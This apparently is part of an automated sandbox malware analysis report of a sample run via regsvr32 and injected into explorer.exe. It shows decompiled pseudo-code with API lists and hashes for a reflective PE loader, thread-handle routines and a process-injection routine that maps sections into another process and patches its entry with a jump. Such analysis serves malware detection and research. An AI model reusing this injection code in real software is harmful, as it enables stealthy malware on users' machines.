						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x84e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}

0x00092d76
0x00092d7b
0x00092d7f
0x00092d82
0x00092d82
0x00092d85
0x00092d8a
0x00092d8f
0x00092d92
0x00092d97
0x00092d9a
0x00092da0
0x00092da0
0x00092dab
0x00092dae
0x00092db5
0x00092dba
0x00000000
0x00000000
0x00092dc0
0x00092dc5
0x00092dc5
0x00092dca
0x00092dd0
0x00092dda
0x00092ddf
0x00092de5
0x00092e04
0x00092e07
0x00092e12
0x00092e12
0x00092e12
0x00092e09
0x00092e09
0x00092e0b
0x00000000
0x00092e0d
0x00092e0d
0x00092e0d
0x00092e0b
0x00092e1a
0x00092e1f
0x00092e24
0x00092e2a
0x00092e2e
0x00092e31
0x00092e34
0x00092e3a
0x00092e3f
0x00092e42
0x00092e48
0x00092e4d
0x00092e53
0x00092e59
0x00092e5e
0x00092e61
0x00092e66
0x00092e6a
0x00092e6e
0x00092e71
0x00092e74
0x00092e7d
0x00092e84
0x00092e87
0x00092e8a
0x00092e8f
0x00092e94
0x00092e97
0x00092e9a
0x00092e9a
0x00092e9e
0x00092ea7
0x00092eae
0x00092eb1
0x00092eb6
0x00092ebb
0x00092ebb
0x00092ebe
0x00092ec3
0x00000000
0x00000000
0x00092de7
0x00092de9
0x00092df6
0x00000000
0x00000000
0x00092df6
0x00092de9
0x00000000
0x00092de5
0x00092ec9
0x00092ece
0x00092ed1
0x00092ed4
0x00092f7f
0x00092f7f
0x00092eda
0x00092eda
0x00092eda
0x00092edf
0x00092f09
0x00092f0c
0x00092f0c
0x00092f11
0x00092f13
0x00092f15
0x00092f18
0x00092f1b
0x00092f23
0x00092f28
0x00092f28
0x00092f2e
0x00092f31
0x00092f34
0x00092f37
0x00092f39
0x00092f39
0x00092f3a
0x00092f3a
0x00092f37
0x00092f48
0x00092f4b
0x00092f4f
0x00092f54
0x00092f57
0x00092f5a
0x00092f5a
0x00092f5a
0x00092f5d
0x00092f5d
0x00092f60
0x00092f60
0x00092ee1
0x00092ee1
0x00092ef1
0x00092ef4
0x00092ef9
0x00092ef9
0x00092efc
0x00092eff
0x00092f02
0x00092f04
0x00092f04
0x00092f63
0x00092f65
0x00092f68
0x00092f68
0x00092f6e
0x00092f72
0x00092f75
0x00092f77
0x00092f77
0x00092f88
0x00092f8a
0x00092f8a
0x00092f92
0x00092fa0
0x00092fa3
0x00092fa5
0x00092fc5
0x00092fc5
0x00092fc8
0x00092fce
0x00092fcf
0x00092fd2
0x00092fd4
0x00092fd7
0x00092fda
0x00092fdd
0x00092fe1
0x00092fe4
0x00092fe7
0x00092fea
0x00092fec
0x00092fec
0x00092fef
0x00092ff1
0x00092ff1
0x00092ff4
0x00092ff6
0x00092ff9
0x00093001
0x00093004
0x00093009
0x00093009
0x0009300f
0x00093012
0x00093015
0x00093017
0x00093017
0x00093018
0x00093018
0x00093023
0x00093023
0x00093023
0x00093026
0x00093029
0x00093029
0x0009302c
0x0009302c
0x00092fef
0x0009302f
0x00093032
0x00093035
0x00093037
0x0009303a
0x0009303c
0x0009303f
0x00093042
0x00093044
0x00093047
0x0009304f
0x00093057
0x0009305a
0x0009305a
0x0009305a
0x0009305d
0x0009305d
0x0009305d
0x00093060
0x00093066
0x00093068
0x00093068
0x0009306e
0x00093074
0x0009307d
0x00093084
0x00093086
0x00093089
0x00093089
0x0009308c
0x0009308c
0x0009308f
0x00093091
0x00093094
0x00093096
0x000930b1
0x000930b1
0x000930b5
0x000930b8
0x000930bb
0x000930be
0x000930d4
0x000930d4
0x000930d4
0x000930c0
0x000930c0
0x000930c2
0x000930c6
0x000930c9
0x00000000
0x000930cb
0x000930cb
0x000930cd
0x00000000
0x000930cf
0x000930cf
0x000930cf
0x000930cd
0x000930c9
0x000930d8
0x000930db
0x000930e0
0x000930ea
0x000930ea
0x000930ea
0x000930ed
0x00093098
0x00093098
0x0009309a
0x000930a1
0x000930a1
0x000930a3
0x000930a5
0x000930a7
0x000930ab
0x000930ad
0x000930af
0x00000000
0x00000000
0x000930af
0x000930ab
0x0009309c
0x0009309c
0x0009309f
0x00000000
0x00000000
0x0009309f
0x0009309a
0x000930f7
0x000930f9
0x000930f9
0x00093104
0x00092fa7
0x00092fa7
0x00092faa
0x00000000
0x00092fac
0x00092fac
0x00092fae
0x00092fb2
0x00000000
0x00092fb4
0x00092fb4
0x00092fb4
0x00092fb7
0x00000000
0x00092fbb
0x00092fc4
0x00092fc4
0x00092fb7
0x00092fb2
0x00092faa
0x00092f96
0x00092f9f
0x00092f9f

APIs

memcpy.MSVCRT ref: 00092E7D
memcpy.MSVCRT ref: 00092EF4
memcpy.MSVCRT ref: 00092F23
memcpy.MSVCRT ref: 00092F4F
memcpy.MSVCRT ref: 00093004

Part of subcall function 00095D90: memcpy.MSVCRT ref: 00095E6E

Part of subcall function 00094AF0: memcpy.MSVCRT ref: 00094B1A

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
Instruction ID: 185e7931b200b5f00758bf730992471f6333a59919987fd71983e5a0ce0181f8
Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
Instruction Fuzzy Hash: 74D11271A00B049FCB68CF69D8D4AAAB7F1FF88304B24892DE88AC7741D771E9449B54

Uniqueness

Uniqueness Score: -1.00%

Function 00092AEC, Relevance: 6.2, APIs: 4, Instructions: 219
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E00092AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}

0x00092afb
0x00092b01
0x00092b0a
0x00092b0d
0x00092b10
0x00000000
0x00092c01
0x00092c05
0x00092c07
0x00092c15
0x00092d33
0x00092d3c
0x00092d3f
0x00092d43
0x00092d49
0x00092d51
0x00092d51
0x00092d59
0x00000000
0x00092d64
0x00092c1b
0x00092c24
0x00092c32
0x00092c35
0x00092c52
0x00092c59
0x00092c6b
0x00092c6b
0x00092c72
0x00092c82
0x00092c9a
0x00092c84
0x00092c8c
0x00092c8c
0x00092c9d
0x00092ca1
0x00092cb1
0x00092cd4
0x00092ce6
0x00092cb3
0x00092cc7
0x00092cc7
0x00092cf0
0x00092d0c
0x00092cf2
0x00092d01
0x00092d01
0x00092d14
0x00092d1d
0x00092d1d
0x00092d2b
0x00000000
0x00092c74
0x00092c76
0x00000000
0x00092c76
0x00092c72
0x00000000
0x00092c35
0x00092b18
0x00092b26
0x00092b2b
0x00092b36
0x00092b39
0x00092b3d
0x00092b3f
0x00092b4f
0x00092b58
0x00092b61
0x00092b69
0x00092b72
0x00092b7d
0x00092b83
0x00092b86
0x00092b89
0x00092b90
0x00092b97
0x00000000
0x00000000
0x00092ba2
0x00092bb0
0x00092bbb
0x00092bc5
0x00092bdd
0x00092bea
0x00092bea
0x00092bc7
0x00092bd2
0x00092bd2
0x00092bf1
0x00092bf1
0x00092bf9
0x00092bf9
0x00000000

APIs

GetModuleHandleA.KERNEL32(?), ref: 00092C4C
LoadLibraryA.KERNEL32(?), ref: 00092C65
GetProcAddress.KERNEL32(00000000,890CC483), ref: 00092CC1
GetProcAddress.KERNEL32(00000000,?), ref: 00092CE0

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID:
API String ID: 384173800-0
Opcode ID: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
Instruction ID: f71a99207cef5de23c8ddc2f8d773f6edabddc3cd5bada4ad458651b88394428
Opcode Fuzzy Hash: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
Instruction Fuzzy Hash: E4A17AB5A01209EFCF54CFA8C885AADBBF1FF08314F148459E815AB351D734AA81DF64

Uniqueness

Uniqueness Score: -1.00%

Function 00081C68, Relevance: 6.1, APIs: 4, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00081C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0x9e6dc; // 0x1d8
				_t13 = E0008A4BF(_t41, 0);
				while(_t13 < 0) {
					E0008980C( &_v28);
					_t43 =  *0x9e6e0; // 0x0
					_t15 =  *0x9e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0x9e684; // 0x34f8f0
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x9e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0x9e684; // 0x34f8f0
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0x9e6dc; // 0x1d8
						__eflags = 0;
						_t13 = E0008A4BF(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0x9e6e8; // 0x34ffd0
				_v28 = _t20;
				_t22 = E0008A6A9(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x9e6d0, 0, 0, 2);
					E0008980C(0x9e6e0);
					_t64 = E00081A1B( &_v28, E00081226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0x9e760);
						_t51 = 0x27;
						E00089F06(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0x9e684; // 0x34f8f0
				 *((intOrPtr*)(_t29 + 0x30))( *0x9e6d0);
				_t48 =  *0x9e6dc; // 0x1d8
				 *0x9e6d0 = 0;
				E0008A4DB(_t48);
				E0008861A( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

0x00081c68
0x00081c75
0x00081c77
0x00081c7e
0x00081ce4
0x00081c8b
0x00081c90
0x00081c96
0x00081c9b
0x00081ca1
0x00081ca3
0x00081ca7
0x00081d15
0x00081d17
0x00081d99
0x00081d9f
0x00081d9f
0x00081ca9
0x00081cb1
0x00081cb1
0x00081cbd
0x00081cc3
0x00081cc5
0x00000000
0x00000000
0x00081cc7
0x00081cd1
0x00081cd7
0x00081cdd
0x00081cdf
0x00000000
0x00081cdf
0x00081cab
0x00081caf
0x00000000
0x00000000
0x00000000
0x00081caf
0x00081cee
0x00081cef
0x00081cf0
0x00081cf1
0x00081cf2
0x00081cf7
0x00081d01
0x00081d06
0x00081d0e
0x00081d29
0x00081d2c
0x00081d36
0x00081d41
0x00081d54
0x00081d56
0x00081d58
0x00081d5a
0x00081d5b
0x00081d63
0x00081d64
0x00081d6a
0x00081d10
0x00081d10
0x00081d10
0x00081d6b
0x00081d76
0x00081d79
0x00081d7f
0x00081d85
0x00081d90
0x00081d97
0x00000000

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5440ee2a19d37476f6d76c6c202a165a4a6b38181fe6b17b305cff97d8016c0a
Instruction ID: b7eecfca9752b51bd3878614f3e3ca223f58aa9d07610ca166e7e1ee13e62024
Opcode Fuzzy Hash: 5440ee2a19d37476f6d76c6c202a165a4a6b38181fe6b17b305cff97d8016c0a
Instruction Fuzzy Hash: A431C232604340AFE754FFA4EC859AA77ADFB943A0F54092BF581C32E2DE389C058756

Uniqueness

Uniqueness Score: -1.00%

Function 00081B2D, Relevance: 6.1, APIs: 4, Instructions: 97
threadCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00081B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0x9e6f4; // 0x1d4
				_t12 = E0008A4BF(_t38, 0);
				while(_t12 < 0) {
					E0008980C( &_v28);
					_t40 =  *0x9e700; // 0x0
					_t14 =  *0x9e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0x9e684; // 0x34f8f0
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x9e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0x9e684; // 0x34f8f0
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0x9e6f4; // 0x1d4
								__eflags = 0;
								_t12 = E0008A4BF(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E0008980C(0x9e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x9e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0x9e6e8; // 0x34ffd0
				_v28 = _t24;
				_t61 = E00081A1B( &_v28, E0008131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0x9e760);
					_t48 = 0x27;
					E00089F06(_t48);
				}
				if(_v24 != 0) {
					E00086890( &_v24);
				}
				_t26 =  *0x9e684; // 0x34f8f0
				 *((intOrPtr*)(_t26 + 0x30))( *0x9e6ec);
				_t28 =  *0x9e758; // 0x0
				 *0x9e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0x9e6f4; // 0x1d4
				 *0x9e758 =  !=  ? 1 : _t28;
				E0008A4DB(_t46);
				_t15 = _t61;
				goto L12;
			}

0x00081b2d
0x00081b33
0x00081b41
0x00081baf
0x00081b4e
0x00081b53
0x00081b59
0x00081b5e
0x00081b64
0x00081b66
0x00081b6a
0x00081c64
0x00081c64
0x00081b70
0x00081b70
0x00081b7c
0x00081b7c
0x00081b88
0x00081b8e
0x00081b90
0x00000000
0x00081b92
0x00081b92
0x00081b9c
0x00081ba2
0x00081ba8
0x00081baa
0x00000000
0x00081baa
0x00081b72
0x00081b72
0x00081b76
0x00000000
0x00000000
0x00000000
0x00000000
0x00081b76
0x00081b70
0x00081c5d
0x00081c63
0x00081c63
0x00081bb8
0x00081bcc
0x00081bcf
0x00081bd9
0x00081be5
0x00081bef
0x00081bf0
0x00081bf1
0x00081bf2
0x00081bf7
0x00081c00
0x00081c04
0x00081c06
0x00081c07
0x00081c0f
0x00081c10
0x00081c16
0x00081c1b
0x00081c21
0x00081c21
0x00081c26
0x00081c31
0x00081c34
0x00081c3c
0x00081c48
0x00081c4b
0x00081c51
0x00081c56
0x00081c5b
0x00000000

APIs

GetCurrentProcess.KERNEL32(0009E6EC,00000000,00000000,00000002), ref: 00081BCC
GetCurrentThread.KERNEL32(00000000), ref: 00081BCF
GetCurrentProcess.KERNEL32(00000000), ref: 00081BD6
DuplicateHandle.KERNEL32 ref: 00081BD9

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: Current$Process$DuplicateHandleThread
String ID:
API String ID: 3566409357-0
Opcode ID: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
Instruction ID: c21506e0fc88ba440ea6bcc6b6f55abd04b465cff164c1f0cab10b664a380183
Opcode Fuzzy Hash: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
Instruction Fuzzy Hash: F13184716043519FF704FFA4EC899AA77A9FF94390B04496EF681C72A2DB389C05CB52

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exe PID: 2936 Parent PID: 3020 regsvr32.exeCOMMON

Executed Functions

Function 1000C6C0, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 200
nativeregistrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E1000C6C0(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				void* _v32;
				intOrPtr _v36;
				long _v40;
				void* _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				void* _t69;
				intOrPtr _t75;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct _EXCEPTION_RECORD _t116;
				void* _t126;
				void* _t131;
				intOrPtr _t134;
				void* _t140;
				void* _t141;

				_t69 =  *0x1001e688; // 0x1820590
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E1000E23E(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0x1001e780; // 0x189fbc8
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						NtUnmapViewOfSection(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						NtClose(_v16);
					}
					return _v8;
				}
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				if(NtCreateSection( &_v16, 0xe, _t116,  &_v44, 0x40, 0x8000000, _t116) < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0); // executed
					if(_t106 != 0) {
						DestroyWindow(_t106); // executed
						UnregisterClassA( &_v56, 0);
					}
				}
				if(NtMapViewOfSection(_v16, GetCurrentProcess(),  &_v12, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_t126 = _v20;
					if(NtMapViewOfSection(_v16, _t126,  &_v8, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
						goto L12;
					}
					_t140 = E10008669( *0x1001e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t131 = VirtualAllocEx(_t126, 0, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E1000861A( &_v32, 0x1ac4);
					_t141 =  *0x1001e688; // 0x1820590
					 *0x1001e688 = _t131;
					E100086E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E1000C63F(_v12, _v8, _v36);
					 *0x1001e688 = _t141;
					goto L14;
				}
			}

APIs

NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
RegisterClassExA.USER32 ref: 1000C785
CreateWindowExA.USER32 ref: 1000C7B0
DestroyWindow.USER32 ref: 1000C7BB
UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C7E2
NtMapViewOfSection.NTDLL(?,00000000), ref: 1000C7EC
NtMapViewOfSection.NTDLL(?,1000CBA0,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C813
VirtualAllocEx.KERNEL32(1000CBA0,00000000,00001AC4,00001000,00000004), ref: 1000C856
WriteProcessMemory.KERNEL32(1000CBA0,00000000,00000000,00001AC4,?), ref: 1000C86F

Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660

GetCurrentProcess.KERNEL32(00000000), ref: 1000C8DB
NtUnmapViewOfSection.NTDLL(00000000), ref: 1000C8E2
NtClose.NTDLL(00000000), ref: 1000C8F5

Strings

sadccdcdsasa, xrefs: 1000C73E
cdcdwqwqwq, xrefs: 1000C76A
0, xrefs: 1000C74D

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: Section$ProcessView$ClassCreateCurrentWindow$AllocCloseDestroyFreeHeapMemoryRegisterUnmapUnregisterVirtualWrite
String ID: 0$cdcdwqwqwq$sadccdcdsasa
API String ID: 2002808388-2319545179
Opcode ID: 142da9db68d52c38d717a02c0839c2ca2f1210e5572982ee18d12491895b5d42
Instruction ID: 6d8830cee459303ec09d51d2f03be3a40535ffb0f4457941fb28a5827401908c
Opcode Fuzzy Hash: 142da9db68d52c38d717a02c0839c2ca2f1210e5572982ee18d12491895b5d42
Instruction Fuzzy Hash: 50711A71900259AFEB11CF95CC89EAEBBB9FF49740F118069F605B7290D770AE04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 1000CB77, Relevance: 7.6, APIs: 5, Instructions: 105
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E1000CB77(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v23;
				void _v24;
				long _v28;
				void* _v568;
				void _v744;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t32;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t39;
				intOrPtr _t43;
				void* _t63;
				long _t65;
				void* _t70;
				void** _t73;
				void* _t74;

				_t73 = __edx;
				_t63 = __ecx;
				_t74 = 0;
				if(E1000C4CE(__ecx, __edx, __edx, 0) != 0) {
					_t39 = E1000C6C0( *((intOrPtr*)(__edx)), _a4); // executed
					_t74 = _t39;
					if(_t74 != 0) {
						memset( &_v744, 0, 0x2cc);
						_v744 = 0x10002;
						_push( &_v744);
						_t43 =  *0x1001e684; // 0x189faa0
						_push(_t73[1]);
						if( *((intOrPtr*)(_t43 + 0xa8))() != 0) {
							_t70 = _v568;
							_v12 = _v12 & 0x00000000;
							_v24 = 0xe9;
							_t65 = 5;
							_v23 = _t74 - _t70 - _a4 + _t63 + 0xfffffffb;
							_v8 = _t65;
							_v16 = _t70;
							if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t73, _v568,  &_v24, _t65,  &_v8) < 0) {
								L6:
								_t74 = 0;
							} else {
								_v28 = _v28 & 0x00000000;
								if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, _v12,  &_v28) < 0) {
									goto L6;
								}
							}
						}
					}
				}
				_t32 =  *0x1001e77c; // 0x0
				if(_t32 != 0) {
					FreeLibrary(_t32);
					 *0x1001e77c =  *0x1001e77c & 0x00000000;
				}
				_t33 =  *0x1001e784; // 0x0
				if(_t33 != 0) {
					_t35 =  *0x1001e684; // 0x189faa0
					 *((intOrPtr*)(_t35 + 0x10c))(_t33);
					E1000861A(0x1001e784, 0xfffffffe);
				}
				return _t74;
			}

APIs

Part of subcall function 1000C4CE: LoadLibraryW.KERNEL32 ref: 1000C5C6
Part of subcall function 1000C4CE: memset.MSVCRT ref: 1000C605

FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73

Part of subcall function 1000C6C0: NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
Part of subcall function 1000C6C0: RegisterClassExA.USER32 ref: 1000C785
Part of subcall function 1000C6C0: CreateWindowExA.USER32 ref: 1000C7B0
Part of subcall function 1000C6C0: DestroyWindow.USER32 ref: 1000C7BB
